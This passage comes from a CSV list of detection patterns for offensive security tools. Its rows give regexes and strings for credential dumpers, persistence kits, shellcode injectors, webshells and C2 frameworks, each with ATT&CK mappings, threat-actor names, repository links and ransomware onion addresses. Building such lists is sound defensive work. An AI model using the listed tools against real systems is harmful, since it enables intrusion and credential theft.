T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","48447" "*include Msf::Exploit::Remote::HttpServer*",".{0,1000}include\sMsf\:\:Exploit\:\:Remote\:\:HttpServer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48448" "*include*bofmask.h*",".{0,1000}include.{0,1000}bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","48449" "*incognito* list_tokens -u*",".{0,1000}incognito.{0,1000}\slist_tokens\s\-u.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48450" "*incognito.exe*",".{0,1000}incognito\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48451" "*incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid.onion*",".{0,1000}incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48454" "*incpaysp74dphcbjyvg2eepxnl3tkgt5mq5vd4tnjusoissz342bdnad.onion*",".{0,1000}incpaysp74dphcbjyvg2eepxnl3tkgt5mq5vd4tnjusoissz342bdnad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48455" "*Indestructible7/Imminent-Monitor*",".{0,1000}Indestructible7\/Imminent\-Monitor.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","48456" "*inexorableposh.exe*",".{0,1000}inexorableposh\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - 
TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48457" "*infection_monkey.py*",".{0,1000}infection_monkey\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","48458" "*InflativeLoading.py *",".{0,1000}InflativeLoading\.py\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","48459" "*InflativeLoading-DumpPEFromMemory*",".{0,1000}InflativeLoading\-DumpPEFromMemory.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","48460" "*INFO: Adding keepass backdoor persistence*",".{0,1000}INFO\:\sAdding\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48464" "*INFO: Adding registry 
persistence*",".{0,1000}INFO\:\sAdding\sregistry\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48465" "*INFO: Adding scheduled task backdoor persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48466" "*INFO: Adding scheduled task persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48467" "*INFO: Adding service persistence*",".{0,1000}INFO\:\sAdding\sservice\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48468" "*INFO: Adding startup folder persistence*",".{0,1000}INFO\:\sAdding\sstartup\sfolder\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48469" "*INFO: Adding tortoise svn persistence*",".{0,1000}INFO\:\sAdding\stortoise\ssvn\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48470" "*INFO: Checking backdoor present in KeePass config file*",".{0,1000}INFO\:\sChecking\sbackdoor\spresent\sin\sKeePass\sconfig\sfile.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48471" "*INFO: Listing all scheduled tasks available to backdoor.*",".{0,1000}INFO\:\sListing\sall\sscheduled\stasks\savailable\sto\sbackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","48472" "*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","#email","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48475" 
"*info@tor2web.org*",".{0,1000}info\@tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#email","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","48476" "*infoga.py -*",".{0,1000}infoga\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48477" "*Information Collection via DLL Injection (Ring3 Hook)*",".{0,1000}Information\sCollection\svia\sDLL\sInjection\s\(Ring3\sHook\).{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48478" "*information_gathering_tools.py*",".{0,1000}information_gathering_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","48479" 
"*InfosecMatter/Minimalistic-offensive-security-tools*",".{0,1000}InfosecMatter\/Minimalistic\-offensive\-security\-tools.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","48480" "*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is an alternative RDPWrap written in C# to allow multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","48481" "*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is an alternative RDPWrap written in C# to allow multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","48482" "*Initial_Access.ps1*",".{0,1000}Initial_Access\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","48484" "*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*",".{0,1000}InitialAccess_SpearphishingAttachment_FakeWordDoc\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","48485" "*InitialAccess_SpearphishingAttachment_Windows.py*",".{0,1000}InitialAccess_SpearphishingAttachment_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","48486" "*Initialised lsarelayx*",".{0,1000}Initialised\slsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - 
T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","48487" "*initialize_fake_thread_state*",".{0,1000}initialize_fake_thread_state.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","48488" "*initialize_spoofed_callstack*",".{0,1000}initialize_spoofed_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","48489" "*initializeShellcodeFluctuation*",".{0,1000}initializeShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","48490" "*Initializing domainDumper()*",".{0,1000}Initializing\sdomainDumper\(\).{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","48491" "*Initializing SharpHound at *",".{0,1000}Initializing\sSharpHound\sat\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48493" "*Initializing SharpHound at *",".{0,1000}Initializing\sSharpHound\sat\s.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48494" "*Initializing SharpHound at {time} on {date}*",".{0,1000}Initializing\sSharpHound\sat\s\{time\}\son\s\{date\}.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48495" "*initstring/cloud_enum*",".{0,1000}initstring\/cloud_enum.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","48496" "*inject *.dll into a process as a proxy to interact with the target named pipe server*",".{0,1000}inject\s.{0,1000}\.dll\sinto\sa\sprocess\sas\sa\sproxy\sto\sinteract\swith\sthe\starget\snamed\spipe\sserver.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48497" "*inject 1337 /*",".{0,1000}inject\s1337\s\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48498" "*Inject into the proxy process and let it open a named pipe server.*",".{0,1000}Inject\sinto\sthe\sproxy\sprocess\sand\slet\sit\sopen\sa\snamed\spipe\sserver\..{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","48499" "*Inject module and start PtC-RPC server inside LSASS*",".{0,1000}Inject\smodule\sand\sstart\sPtC\-RPC\sserver\sinside\sLSASS.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","48500" "*Inject shellcode on the server.\\nUsage: inject*",".{0,1000}Inject\sshellcode\son\sthe\sserver\.\\\\nUsage\:\sinject.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48501" "*inject shellcode*",".{0,1000}inject\sshellcode.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","48502" "*inject.spawn*",".{0,1000}inject\.spawn.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48503" "*inject.spoofaddr*",".{0,1000}inject\.spoofaddr.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48504" "*inject_dll_reflective.py*",".{0,1000}inject_dll_reflective\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48505" "*inject_dll_srdi.py*",".{0,1000}inject_dll_srdi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 
- TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48506" "*inject_macro_word(*",".{0,1000}inject_macro_word\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","48507" "*inject_shellcode.py*",".{0,1000}inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","48508" "*inject_shellcode_self*",".{0,1000}inject_shellcode_self.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
